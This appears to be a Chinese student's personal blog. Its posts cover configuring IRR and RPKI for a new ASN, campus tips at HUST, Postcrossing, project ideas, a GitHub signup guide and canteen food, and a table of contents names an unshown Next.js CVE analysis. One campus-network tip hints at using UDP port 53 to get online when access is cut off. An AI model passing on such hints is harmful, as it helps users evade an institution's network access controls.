鉴于 IRR 和 RPKI 配置已经是现在互联网安全性的重要保障，而且很多上游和 peer 都强制进行 RPKI 校验，强烈建议直接把 IRR 和 RPKI 配好。IRR 需要自己配置，而 RPKI 只能由 LIR 配置。（因为你的 IP 块实际上是 LIR 所有的）

RPKI: Resource Public Key Infrastructure - 资源公钥基础设施

IRR: Internet Routing Registry - 互联网路由注册表

简要说，它们能够证明这一段 IP 由某个自治系统 (AS) 掌控，以防有人恶意劫持互联网，或有人配错设置导致误劫持互联网的一部分。

建议拿到 ASN 后直接去找 LIR 说你要配 RPKI，LIR 配好后会告诉你。

1.4 配置 IRR

配置 IRR 非常的简单，比你想象的要简单很多。

到 RIPE NCC 的控制面板添加一个数据库条目 (Create an object)。
选择添加 route6 条目（因为我们要广播 IPv6 地址，如果你是有 IPv4 地址块的富哥，那你需要添加 route 条目）
在 route(6) 栏输入你的地址块前缀 (Prefix)，在 origin 栏输入你的 ASN（包括前面的 AS 字母）
Submit!

创建好之后就完成了。

2 结束了？

结束了。~~是不是很简单呢，你也快来注册 ASN 吧~~

经此一役，我们已经有了一个 ASN 和一个 IPv6 地址块。

不过，意料之中的，现在我们并不能直接使用这些资源，在接下来（如果我没有摆）的更新中，应该会介绍 IP 广播，接入 IXP 等后续操作。

Last-Updated: 2024/12/4 14:33

华科冷知识集合地

GoForceX — Tue, 12 Nov 2024 12:41:26 GMT

在华科，我真的什么都不知道.jpg

写在前面：本文用于记录华科的各种 难以查找 或者 没什么人知道 的小知识。问就是踩坑了（悲）

邮政方面

校内的邮筒很多处于无人维护状态，投进去的信至少一段时间内是不会真正寄出的，想要寄信/明信片的话建议考虑邮局。
如果你是认真想寄的，或者如果你不想被连续丢十几件的话，建议考虑快递寄文件。
不要用邮筒！！！会变得不幸，导致我的信件全部丢失 (Update: 20241120)
收到的信怎么取？
- 学校的 邮政服务中心 收到你的信后，根据上面有没有 写手机号，会通过两种方式通知你取信。
  - 如果 写了手机号，那么工作人员会给你发一条短信，格式基本为“您好，你的编号为 xxx 号挂号信……”
  - 如果 没写手机号，那么你的寝室楼下某天就会突然出现一张通知单，上面写着收件人姓名和编号。
- 现在你有了编号，就可以拿着你的 校园卡/身份证 到邮政服务中心（位于老档案馆负一楼，图书馆北侧，顺着青年园边上走就能看见，注意不是邮局！）取信了。
- 你问我国际平信怎么办？~~目前我一封邮路测试信都没有收到，等待中。~~
  可以收到！！！运送时间目测正常，但是地址最好写详细一点。(Update: 20241204)
- 校内能不能给校内寄信？实测 可以，但寄达率极低 (Update: 20241129)。
  具体原因未知，不过校内寄信好像也没什么意义。

校园卡方面

你把钱不小心全都充到 电子账户/卡账户 里了？
- 问题不大，去任意一个食堂都会有的自助机上，在账户间转账里会有卡账户和电子账户互转的选项。
过渡余额是什么？
- 你刚充值进去的钱。去任意一个食堂窗口刷一下或者自助机操作就能进入卡账户了。
宿舍楼的饮水机能不能用手机 NFC 刷卡？
- 不行。但是有个比较神奇的操作。饮水机是先扣费 0.5 元，然后第二次刷卡时返还剩余费用。但是如果你第二次用其他的任意卡刷卡，也会停止出水，但是剩余费用就没了。~~血亏 0.5 元~~
电子账户的钱到底能干什么啊？
- 交网费和电费，其他的好像使用频率都不太高？

校园网方面

话说有没有公网 IP 什么的？
- 有公网 IPv6，v4 就别想了。
我不想连校园网，又想连只有校园网内能用的服务，怎么办？
- 你可能需要办一个校园网 VPN。大一可办，几乎没什么门槛，审批比较松，快冲吧！
- 不过校园网 VPN 连通性比较抽象，不建议一直连着用。
我欠费了，但是要连校园网才能充值，怎么办？
- 登录校园网的时候在学号后面加上 @hust，让你获得 10 分钟临时上网权限，每月可用 3 次。
我是可怜的本科生，半夜没有校园网用怎么办？
- UDP 53 解君愁。具体操作方法请自行搜索，真的可以。

Postcrossing —— 明信片连接世界

GoForceX — Thu, 17 Oct 2024 14:56:59 GMT

~~什么？你问我中国邮政是不是还活着？~~

~~逐渐红温.jpg~~

注: 在下文中，若无特殊说明，PC 均指 Postcrossing。

PC 是什么？

Postcrossing，顾名思义，就是明信片交换的意思。

而同名的网站，则是世界上最大的明信片交换平台，postcrossing.com。

在这里，来自世界各国的 80 余万爱好者已经寄出了近 8000 万张明信片，路程能绕地球 1000 万余圈。

~~不觉得这很酷吗？作为一名理工男我觉得这太酷了……后面忘了。~~

明信片交换是什么意思？

PC 上的明信片交换流程基本如下：

在网站上申请一个明信片号码，网站会在全部可收件的用户里为你随机选出一个幸运收件人。
你把精心准备的明信片按照给出的地址寄出。
对方收到后，在网站上登记明信片（“确认收货”）
你的寄出明信片数量+1，之后在其他人申请明信片号码时，你就有可能会被选中。

网站的实际机制其实比这个复杂很多，比如新人同时可寄出的明信片数量有限制，保证收与寄的数量持平等。

PC 有什么好玩的？

最重要的一点，那就是可以有机会和世界各地的人进行交流。

通过 PC，也能从实物了解世界各国、各地的文化。

当你结束了忙碌的一天终于回家的时候，信箱里的明信片也在默默的等待着你。

你也想玩了吗？

光速快进到 postcrossing.com 狠狠注册账号吧！

从网上购入一些明信片和邮票，PC 旅程就顺利的开始了！

或者你也可以狠狠联系我，来进行私下换片！

Q&A

不觉得平信很不靠谱吗？很容易丢件吧？

之前是这样的，不过现在邮政也很完善了，至少我来华科之前还没碰到过丢信的现象。来了华科之后丢件量也是极少数。

(2024/11/14 Update: 不要用华科校内邮筒寄信，会变得不幸)

国际邮件听起来就很贵吧？

明信片的话，中国邮政的价格是 5 元一张（国际）或 0.8 元一张（中国大陆）。~~谁让中国是发展中国家呢~~

淘宝去买 5 折上下的打折邮票的话，就只需要 2.5 元一张（国际）或 0.4 元一张（中国大陆）了。

特殊的，寄往港澳台的价格介于国际和大陆件之间的，目前是 4 元一张（打折后 2 元一张）。

以上价格均为航空明信片价格，水陆路太慢且不靠谱，十分不建议为了省几毛钱多等好几个月。

灵感聚集地

GoForceX — Tue, 15 Oct 2024 06:52:58 GMT

观前注意：

根据个人既往记录，写在这里面的东西真的做出来的几率无限接近 0（
可问“为什么没做xxx”，可能说的人多的话真的会做。

一些中译中小工具

被同学借走做项目了（乐）

添加日期：2024/10/9

当前状态：构思中 (2024/10/15)

可行性：中高

基本思路：

对于不同长度的原文进行不同处理：

对于长度较短的，通过 RAG 试图补全上下文，扩充出较为符合原本意思的结果。
对于长度较长的，直接随便写个 Prompt 貌似就能用（

同时，人工对知识库进行补充。

事前小测

Test Case #1

LLM: 请帮我预留一些时间，我们安排一个会议来细化工作内容，并确定优先级（P0和P1）。在会议中，我会解释这项任务的核心逻辑，帮助你更好地把握关键点，从而确保整个项目能够顺利完成。

小猿口算小脚本

添加日期：2024/10/9

当前状态：已完成 (2024/10/10) ~~构思中 (2024/10/9)~~

Repo：GoForceX/MaaXiaoYuan: [PoC] 基于 MAA 的小猿口算脚本

HUST API

添加日期：2024/10/12

当前状态：搁置中 (2024/12/16) ~~开发中 (2024/11/14)~~ ~~构思中 (2024/11/11)~~

可行性：中→中低

有什么用？

写一个更便捷的华中大微校园（刷不出界面的痛）
一些整活小工具
- 校园卡消费记录一键整理（难度：中低，搞个年终报告？）
- 电表余额不足自动提醒（难度：低，~~HUST Bot~~）
其他项目不用自己写这部分逻辑了

原来已经有人写了 Python 版，那没事了。

MarvinTerry/HustLogin: A python-lib for authenticating HustPass@2023

~~现在是 Flutter 时间！~~

~~GoForceX/hustlogin: 哈思特烙个印 for dart. 我们 Flutter 也要有自己的 hustlogin.~~

共享日历

添加日期：2024/10/22

当前状态：构思中 (2024/10/23)

可行性：中高→中

来源：整个寝室都忘记去开班会了导致的

每个人可以编辑自己的日历并添加日程，以分享码的形式分享给他人，导入后可自动订阅

不过这种软件现在怎么可能没有呢（

HUSTer 爱上课

添加日期：2024/10/31

当前状态：构思中 (2024/10/31)

可行性：中→中低

根据每周课表计算舒适度
给用户一个校内排名
根据排名给客户匹配一个虚拟形象以供分享。

一言以蔽之：早八数量大比拼，不过其他课也在舒适度计算范围内

有点像 B 站 / 网易云的抽象小活动，可以生成一个带虚拟形象的图片朋友圈分享用

快递小助手

添加日期：2024/11/14

当前状态：构思中 (2024/11/14)

可行性：中低→低

东区人苦快递久已，菜鸟、兔喜、短信的快递消息错综复杂，平台众多，其中还有重合
移动端桌面小组件直接显示全部待取快递（地点、取件码，或许加一个物品信息？）
但是各大平台基本上都没有开放 API，能不能做暂且存疑。

vv 表情包基础设施

添加日期：2024/11/14

当前状态：搭建中 (2024/11/14)

vv 表情包 API

当前状态：已完成 (2024/11/12) →v3 (2024/12/8)

Endpoint: https://vv.cdn.goforcex.top/

文件列表: /files.json

一个小网站，可以方便的搜索 vv 表情包。

当前状态：完善中 (2024/12/11) ~~计划中 (2024/11/14)~~

嘻嘻：https://vv.goforcex.top/

基于 Embedding / 向量数据库的 vv 表情包模糊搜索，结合 LLM 做一个 vvbot（？）

当前状态：计划中 (2024/11/14)

The Bridge

添加日期：2024/11/26

当前状态：构思中 (2024/11/26)

可行性：低

一个不同 IM 通信平台的信息中转服务（比如 QQ↔微信，QQ↔TG/DC 等？）
感觉实现本身不算难？但是适配就有点太抽象了
本身是个不错的想法，但是没这个实力做了（悲）

HUST Bot

添加日期：2024/12/16

当前状态：构思中 (2024/12/16)

可行性：中高

众所周知，华科有很多冷知识，网上搜不到，在新生群也很难问到
这是一个 Bot，基于关键词查询/LLM RAG，根据问题搜索对应的答案

HUSTer 爱工作

添加日期：2024/12/16

当前状态：构思中 (2024/12/16)

可行性：低

校内的找工作平台，不是长期工作，而是类似 fiverr 的平台
提供打零工的机会，包括干活，写东西等

写给大学新生的 GitHub 注册指南

GoForceX — Fri, 27 Sep 2024 13:54:01 GMT

本人也是开发新手，但在身边看到不少不会注册 GitHub 的同学，因此以自己粗浅的认识写下了本文。

希望能帮到有需要的同学们。

为什么要注册 GitHub？

GitHub 是世界上最大的代码托管平台。

在 GitHub 上，你不仅可以托管代码，也可以和全世界的程序员交流，为开源项目做出贡献等。

而且 GitHub 还有很多实用性的功能，如 Copilot、Codespaces 等，实用性极强。

那么怎么注册呢？

速速跳转→https://github.com/signup
点击进入后，界面大约如下图所示：

点击箭头后的空白区域，并输入你的电子邮箱地址，最后再点击 Continue.

再输入你的密码，同上，点击 Continue 继续下一步。
- 对于密码，GitHub 建议用户设置为至少 15 位长，或者至少 8 位长的字母数字组合。
- 为了安全考虑，个人建议使用密码管理工具，并使用随机生成的密码，以保持不同平台的密码不同。
再输入你想设置的用户名，该用户名不能与其他用户重复。
- 请特别注意，用户名虽然在注册后可以更改，但会产生很多麻烦，个人建议在考虑充分后再设置用户名。
再选择你是否想要接收 GitHub 的产品更新邮件，非必选。
进入下一页后，你可能需要完成验证码，在验证码之后，GitHub 会向你所填写的电子邮箱发送一个验证码，填写验证码后，你的 GitHub 账号即注册完成。
登录你的 GitHub 账号，并完成 GitHub 的个性化问卷。
- 懒得做的话可以点下面的 Skip personalization.

喜报，~~不出意外的话~~，你的 GitHub 账号现已注册完毕了。

你说你还不会用 Git？

关于 Git 的相关配置，在 GitHub 上有很详细的教程。

让 Git 能用: 设置 Git - GitHub 文档
让 Git 与 GitHub 协同作战: 在 Git 中缓存 GitHub 凭据 - GitHub 文档
证明你的代码真的是你上传的:

什么？你说你是来白嫖的？

~~那你确实没来错地方。~~

要说起学生优惠，那 GitHub Education（俗称学生包）是不得不提的了。

学生包申请地址→Get your GitHub benefits - GitHub Education

学生包优惠都有啥？→GitHub Student Developer Pack - GitHub Education ~~谁说对了就给他~~

输入你的学校名称，然后点击 Continue. GitHub 可能会要求你绑定学校的电子邮箱，这可以极大地降低申请的难度。

不过如果你没有学校的邮箱，也是可以申请的，但是你需要上传录取通知书、校园卡等证明信息。

一个新生的华科饮食推荐

GoForceX — Wed, 25 Sep 2024 15:39:50 GMT

推荐范围仅限本人吃过多次的。

什么，你问我为什么没有xx？那你最好再看一眼题目。

~~其实主要是给自己看的（~~

食堂

东园

东园一层

铁板饭

推荐牛肉 + 黑椒。主打一个热乎，可以说是色香味俱全了。

*用餐高峰期可能排队时间较长。

东园三层

全都是自助餐，没记错的话价格是 1.4 元 / 两。性价比高，好吃，强力推荐！

*用餐高峰期可能较为拥挤，很难找到空座位。

学一食堂

一楼

云南米线

推荐临沧牛肉米线，~~因为我现在只吃了这个~~，总之味道不错。

二楼

兰州拉面

强烈推荐！价格 6 元，性价比高，你甚至还可以加一个 6.5 元的鸡腿。

*用餐高峰期可能较为拥挤，很难找到空座位。

↑ 答案是端着碗，出门左转，就能看到一个神秘小房间，里面有很多座位。

拌面

好吃，闭眼买就行。

大盘鸡面只要 6 块钱，还要什么自行车呢。

紫荆园

石锅饭

吃过鸡肉的，味道感觉不错，但是我是牛肉控，以后如果有幸吃到的话可以补上这一部分。

外卖 / 饭店

“少年啊，你可知膨胀优惠为何物？”

想必很多快餐大家都吃过，这一部分并不会以菜品推荐为主。

汉堡王

我愿称之为东区外卖送的最快的店。

水巷微韵苑 小程序可以外卖 14.9 元的双层汉堡，美团也会时不时掉落高性价比优惠（线下核销居多）。

吉野家

放在这里只是因为我本人比较爱吃。应该不会只有我爱吃吉野家吧（

// WIP

参考资料

[1]: 华科周边美食推荐 | dekrt's blog

[2]: 华科食堂美食推荐 | dekrt's blog

感谢华莱士哥使我的胃免于韵酒，这两篇基本上是我们整个寝室的用餐指南了（

Hello world.

GoForceX — Tue, 24 Sep 2024 13:21:00 GMT

博客项目再开！

希望别断更吧，大约会放一些平时学到的东西（

// WIP

GoForceX's Blog

CVE-2025-55182 是怎么让 Next.js 大爆的？

RSC / Server Functions

React Flight Protocol

我们来看看 PoC 吧！

Let's think step by step.

引用到底有多厉害？

如何运行我们传入的代码？

喜欢异步的孩子们有福了！

Let's start from here!

还能优化一下吗？

References

NAT64 / DNS64？尝一下

你说得对……但是为什么要用这个呢？

Let's start from here!

等等，这些名词都是什么东西？

NAT64

DNS64

事前准备

配置 NAT64

配置 DNS64

写在最后

记一次尝试在 Docker 上启用 IPv6 访问的顶级折磨

1 客观条件与需求

2 地址段分配

3 嘻嘻 我要抄教程

4 原来就这么简单吗

5 总结

待更新文章小本本

微信 H5 踩坑记录大全

关于分享

关于登录

关于摇一摇

Edge 浏览器 bug 定位——使我的 GitHub 界面被压扁

1 发现问题

2 问题定位

3 结语

4 课后作业

5 为什么还有？

年轻人的第一个 ASN——（1）准备与申请

0 一些前置知识

0.1 谁负责这些事？

0.2 成本如何呢？

0.3 IPv4 or IPv6？

0.4 PA or PI？

0.5 实名上网？

1 具体流程

1.1 一些准备

1.2 申请流程

1.3 然后呢？

1.4 配置 IRR

2 结束了？

华科冷知识集合地

邮政方面

校园卡方面

校园网方面

Postcrossing —— 明信片连接世界

PC 是什么？

明信片交换是什么意思？

PC 有什么好玩的？

你也想玩了吗？

Q&A

不觉得平信很不靠谱吗？很容易丢件吧？

国际邮件听起来就很贵吧？

灵感聚集地

一些中译中小工具

事前小测

小猿口算小脚本

HUST API

共享日历

HUSTer 爱上课

快递小助手

vv 表情包基础设施

The Bridge

HUST Bot

HUSTer 爱工作

写给大学新生的 GitHub 注册指南

为什么要注册 GitHub？

那么怎么注册呢？

你说你还不会用 Git？

3 嘻嘻我要抄教程